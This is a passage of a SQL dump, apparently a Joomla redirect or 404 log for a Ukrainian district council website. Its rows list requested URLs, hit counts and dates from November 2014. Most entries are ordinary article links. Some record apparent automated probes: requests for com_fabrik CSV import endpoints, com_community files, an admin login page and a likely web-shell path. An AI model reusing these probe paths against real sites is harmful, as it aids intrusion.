00:00:00',301),(9343,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=922:2013-02-11-10-53-17&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-01 10:37:29','0000-00-00 00:00:00',301),(9344,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-01 10:49:37','0000-00-00 00:00:00',301),(9345,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-01 11:04:58','0000-00-00 00:00:00',301),(9346,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1280:-2014-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-01 11:33:59','0000-00-00 00:00:00',301),(9347,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38&Itemid=73&lang=en','','','',2,0,'2014-11-01 12:18:18','0000-00-00 00:00:00',301),(9348,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1263:2014-03-31-14-00-08&catid=10&Itemid=17&lang=uk','','','',6,0,'2014-11-01 12:25:58','0000-00-00 00:00:00',301),(9349,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38:--19122011-&Itemid=73&lang=en','','','',3,0,'2014-11-01 12:47:38','0000-00-00 00:00:00',301),(9350,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51&Itemid=92&lang=uk','','','',7,0,'2014-11-01 12:51:25','0000-00-00 00:00:00',301),(9351,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-11-01 13:18:50','0000-00-00 00:00:00',301),(9352,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1263:2014-03-31-14-00-08&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',2,0,'2014-11-01 13:26:25','0000-00-00 00:00:00',301),(9353,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&Itemid=32&lang=ru','','','',5,0,'2014-11-01 13:46:57','0000-00-00 00:00:00',301),(9354,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1292:-i-&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-01 14:31:54','0000-00-00 00:00:00',301),(9355,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1046:-2013-&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-01 15:20:55','0000-00-00 00:00:00',301),(9356,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1242:-25-2011-74-19-2011-193-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-01 16:22:04','0000-00-00 00:00:00',301),(9357,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-01 16:39:31','0000-00-00 00:00:00',301),(9358,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1282:-30-6-&lang=uk&option=com_content&view=article','','','',5,0,'2014-11-01 16:55:40','0000-00-00 00:00:00',301),(9359,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1153:-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-01 16:55:42','0000-00-00 00:00:00',301),(9360,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1307:2014-04-30-15-26-52&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-01 16:55:44','0000-00-00 00:00:00',301),(9361,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1196:2014-01-30-14-12-50&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-01 16:55:54','0000-00-00 00:00:00',301),(9362,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=ru','','','',4,0,'2014-11-01 17:07:36','0000-00-00 00:00:00',301),(9363,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=uk','','','',5,0,'2014-11-01 17:22:54','0000-00-00 00:00:00',301),(9364,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=965:2013-03-14-10-56-03&lang=en&option=com_content&view=article','','','',1,0,'2014-11-01 17:41:23','0000-00-00 00:00:00',301),(9365,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-01 17:51:08','0000-00-00 00:00:00',301),(9366,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-01 17:55:16','0000-00-00 00:00:00',301),(9367,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=ru&Itemid=','','','',3,0,'2014-11-01 18:12:30','0000-00-00 00:00:00',301),(9368,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=en','','','',2,0,'2014-11-01 19:47:39','0000-00-00 00:00:00',301),(9369,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=en','','','',4,0,'2014-11-01 19:49:09','0000-00-00 00:00:00',301),(9370,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=en','','','',5,0,'2014-11-01 19:49:22','0000-00-00 00:00:00',301),(9371,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-01 19:55:01','0000-00-00 00:00:00',301),(9372,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1319:-2014-&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-01 20:06:11','0000-00-00 00:00:00',301),(9373,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=935:----------14-112012332-l------r&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-01 20:06:19','0000-00-00 00:00:00',301),(9374,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-01 20:23:29','0000-00-00 00:00:00',301),(9375,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=en','','','',4,0,'2014-11-01 20:24:07','0000-00-00 00:00:00',301),(9376,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1015:-200-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-01 20:50:59','0000-00-00 00:00:00',301),(9377,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=999:2013-04-28-05-21-05&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-01 20:51:03','0000-00-00 00:00:00',301),(9378,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1344:--------25--2013--464-l-----------&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-01 21:40:56','0000-00-00 00:00:00',301),(9379,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1227:2014-02-25-07-36-58&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-01 22:25:56','0000-00-00 00:00:00',301),(9380,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1057:--22072013--2100-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-01 22:25:58','0000-00-00 00:00:00',301),(9381,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=988:-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-01 22:43:16','0000-00-00 00:00:00',301),(9382,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-11-01 22:54:22','0000-00-00 00:00:00',301),(9383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&catid=58&Itemid=105&lang=en','','','',4,0,'2014-11-01 23:07:43','0000-00-00 00:00:00',301),(9384,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=960:-19-&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-01 23:15:20','0000-00-00 00:00:00',301),(9385,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1106:-qq&lang=en&option=com_content&view=article','','','',1,0,'2014-11-01 23:15:43','0000-00-00 00:00:00',301),(9386,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&catid=58:--30042014-&Itemid=105&lang=en','','','',3,0,'2014-11-01 23:22:46','0000-00-00 00:00:00',301),(9387,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1047:2013-07-10-05-51-36&lang=ru&option=com_content&view=article','','','',5,0,'2014-11-01 23:59:55','0000-00-00 00:00:00',301),(9388,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=en&Itemid=','','','',3,0,'2014-11-02 00:05:06','0000-00-00 00:00:00',301),(9389,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-02 00:34:21','0000-00-00 00:00:00',301),(9390,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=en','','','',4,0,'2014-11-02 00:34:32','0000-00-00 00:00:00',301),(9391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-02 00:36:09','0000-00-00 00:00:00',301),(9392,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=en&Itemid=','','','',5,0,'2014-11-02 00:49:31','0000-00-00 00:00:00',301),(9393,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1078:-2007-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-02 00:50:28','0000-00-00 00:00:00',301),(9394,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1245:2014-03-17-17-23-36&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-02 00:50:29','0000-00-00 00:00:00',301),(9395,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=en&Itemid=0','','','',6,0,'2014-11-02 00:58:20','0000-00-00 00:00:00',301),(9396,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1315:-31-6-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-02 02:24:58','0000-00-00 00:00:00',301),(9397,'http://malyn-rayrada.org.ua/tinyempires3k/components/com_community/index.html','','','',1,0,'2014-11-02 03:08:13','0000-00-00 00:00:00',301),(9398,'http://malyn-rayrada.org.ua/tinyempires3k/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-02 03:08:17','0000-00-00 00:00:00',301),(9399,'http://www.malyn-rayrada.org.ua/cart/components/com_community/index.html','','','',1,0,'2014-11-02 03:34:59','0000-00-00 00:00:00',301),(9400,'http://www.malyn-rayrada.org.ua/cart/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-02 03:35:04','0000-00-00 00:00:00',301),(9401,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1023:-------l---28r-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-02 04:00:44','0000-00-00 00:00:00',301),(9402,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1003:1&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-02 04:00:46','0000-00-00 00:00:00',301),(9403,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-11-02 04:08:25','0000-00-00 00:00:00',301),(9404,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=903:-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-02 04:43:47','0000-00-00 00:00:00',301),(9405,'http://malyn-rayrada.org.ua/talk/components/com_community/index.html','','','',1,0,'2014-11-02 05:20:56','0000-00-00 00:00:00',301),(9406,'http://malyn-rayrada.org.ua/talk/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-02 05:21:03','0000-00-00 00:00:00',301),(9407,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1248:2014-03-21-18-16-44&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-02 05:35:42','0000-00-00 00:00:00',301),(9408,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1214:2014-02-18-09-51-45&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-02 06:18:33','0000-00-00 00:00:00',301),(9409,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=en','','','',4,0,'2014-11-02 06:31:24','0000-00-00 00:00:00',301),(9410,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1233:2014-03-03-10-28-35&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-02 07:10:18','0000-00-00 00:00:00',301),(9411,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=uk','','','',3,0,'2014-11-02 07:53:22','0000-00-00 00:00:00',301),(9412,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1046:-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-02 08:15:24','0000-00-00 00:00:00',301),(9413,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=999:2013-04-28-05-21-05&lang=en&option=com_content&view=article','','','',1,0,'2014-11-02 08:45:02','0000-00-00 00:00:00',301),(9414,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=en&Itemid=0','','','',4,0,'2014-11-02 09:25:21','0000-00-00 00:00:00',301),(9415,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-11-02 09:25:34','0000-00-00 00:00:00',301),(9416,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-11-02 09:25:43','0000-00-00 00:00:00',301),(9417,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-02 09:25:45','0000-00-00 00:00:00',301),(9418,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-02 09:25:53','0000-00-00 00:00:00',301),(9419,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-02 09:25:55','0000-00-00 00:00:00',301),(9420,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-02 09:25:58','0000-00-00 00:00:00',301),(9421,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-02 09:26:00','0000-00-00 00:00:00',301),(9422,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=en&Itemid=0','','','',7,0,'2014-11-02 09:26:09','0000-00-00 00:00:00',301),(9423,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-02 09:26:11','0000-00-00 00:00:00',301),(9424,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-02 09:26:13','0000-00-00 00:00:00',301),(9425,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=uk','','','',6,0,'2014-11-02 09:31:06','0000-00-00 00:00:00',301),(9426,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-02 09:31:23','0000-00-00 00:00:00',301),(9427,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-02 09:31:26','0000-00-00 00:00:00',301),(9428,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-02 09:31:28','0000-00-00 00:00:00',301),(9429,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-02 09:31:31','0000-00-00 00:00:00',301),(9430,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-02 09:31:33','0000-00-00 00:00:00',301),(9431,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-02 09:31:36','0000-00-00 00:00:00',301),(9432,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-02 09:31:38','0000-00-00 00:00:00',301),(9433,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-02 09:31:45','0000-00-00 00:00:00',301),(9434,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-02 09:31:54','0000-00-00 00:00:00',301),(9435,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-02 09:31:57','0000-00-00 00:00:00',301),(9436,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-02 09:31:59','0000-00-00 00:00:00',301),(9437,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-02 09:32:02','0000-00-00 00:00:00',301),(9438,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-02 09:32:04','0000-00-00 00:00:00',301),(9439,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=en&Itemid=0','','','',12,0,'2014-11-02 09:34:55','0000-00-00 00:00:00',301),(9440,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-02 09:34:57','0000-00-00 00:00:00',301),(9441,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=uk&Itemid=','','','',5,0,'2014-11-02 09:37:03','0000-00-00 00:00:00',301),(9442,'http://www.malyn-rayrada.org.ua/en/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-11-02 09:39:23','0000-00-00 00:00:00',301),(9443,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1095:2013-09-24-13-25-55&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-02 09:52:26','0000-00-00 00:00:00',301),(9444,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-02 10:05:01','0000-00-00 00:00:00',301),(9445,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=uk','','','',4,0,'2014-11-02 10:05:07','0000-00-00 00:00:00',301),(9446,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=ru','','','',3,0,'2014-11-02 10:33:07','0000-00-00 00:00:00',301),(9447,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-02 11:01:36','0000-00-00 00:00:00',301),(9448,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=uk&Itemid=','','','',4,0,'2014-11-02 11:09:17','0000-00-00 00:00:00',301),(9449,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=ru','','','',5,0,'2014-11-02 11:16:40','0000-00-00 00:00:00',301),(9450,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=uk','','','',4,0,'2014-11-02 11:23:24','0000-00-00 00:00:00',301),(9451,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1083:-2014-&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-02 11:26:38','0000-00-00 00:00:00',301),(9452,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=ru','','','',6,0,'2014-11-02 11:38:31','0000-00-00 00:00:00',301),(9453,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1273:2014-04-10-06-15-24&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-02 12:36:14','0000-00-00 00:00:00',301),(9454,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=918:-2013-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-02 14:11:19','0000-00-00 00:00:00',301),(9455,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&Itemid=14&lang=en','','','',3,0,'2014-11-02 14:12:45','0000-00-00 00:00:00',301),(9456,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&Itemid=14&lang=en','','','',3,0,'2014-11-02 14:12:52','0000-00-00 00:00:00',301),(9457,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-11-02 14:12:54','0000-00-00 00:00:00',301),(9458,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11&Itemid=14&lang=en','','','',2,0,'2014-11-02 14:13:00','0000-00-00 00:00:00',301),(9459,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-11-02 14:13:02','0000-00-00 00:00:00',301),(9460,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11&Itemid=14&lang=en','','','',2,0,'2014-11-02 14:13:04','0000-00-00 00:00:00',301),(9461,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-11-02 14:13:06','0000-00-00 00:00:00',301),(9462,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',18,0,'2014-11-02 14:16:36','0000-00-00 00:00:00',301),(9463,'http://www.malyn-rayrada.org.ua/admin/login.php','','','',5,0,'2014-11-02 14:27:36','0000-00-00 00:00:00',301),(9464,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1060:2013-07-27-10-13-15&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-02 14:37:36','0000-00-00 00:00:00',301),(9465,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1103:2013-10-03-09-29-30&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-02 15:04:40','0000-00-00 00:00:00',301),(9466,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1203:--------------------2014-&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-02 15:04:48','0000-00-00 00:00:00',301),(9467,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1178:2014-01-21-12-39-34&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-02 15:04:50','0000-00-00 00:00:00',301),(9468,'http://www.malyn-rayrada.org.ua/images/stories/indo.php?rf','','','',1,0,'2014-11-02 15:11:46','0000-00-00 00:00:00',301),(9469,'http://www.malyn-rayrada.org.ua/includes/route.php','','','',1,0,'2014-11-02 15:11:56','0000-00-00 00:00:00',301),(9470,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-11-02 15:15:06','0000-00-00 00:00:00',301),(9471,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60:--11072014-&Itemid=108&lang=ru','','','',3,0,'2014-11-02 15:15:14','0000-00-00 00:00:00',301),(9472,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60:--11072014-&Itemid=108&lang=ru','','','',3,0,'2014-11-02 15:15:25','0000-00-00 00:00:00',301),(9473,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-11-02 15:15:27','0000-00-00 00:00:00',301),(9474,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-11-02 15:15:34','0000-00-00 00:00:00',301),(9475,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60:--11072014-&Itemid=108&lang=ru','','','',3,0,'2014-11-02 15:15:38','0000-00-00 00:00:00',301),(9476,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-11-02 15:15:47','0000-00-00 00:00:00',301),(9477,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-11-02 15:16:17','0000-00-00 00:00:00',301),(9478,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-11-02 15:16:21','0000-00-00 00:00:00',301),(9479,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-11-02 15:16:23','0000-00-00 00:00:00',301),(9480,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=6&Itemid=9&lang=ru','','','',8,0,'2014-11-02 15:25:00','0000-00-00 00:00:00',301),(9481,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-02 15:44:09','0000-00-00 00:00:00',301),(9482,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1038:2013-06-28-10-19-47&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-02 17:20:21','0000-00-00 00:00:00',301),(9483,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=en','','','',3,0,'2014-11-02 18:23:01','0000-00-00 00:00:00',301),(9484,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=en','','','',2,0,'2014-11-02 18:28:11','0000-00-00 00:00:00',301),(9485,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=uk','','','',6,0,'2014-11-02 19:01:22','0000-00-00 00:00:00',301),(9486,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57:--15042014-&Itemid=98&lang=ru','','','',13,0,'2014-11-02 